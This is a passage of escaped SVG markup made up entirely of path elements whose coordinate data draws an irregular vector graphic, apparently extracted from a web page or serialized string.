d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n 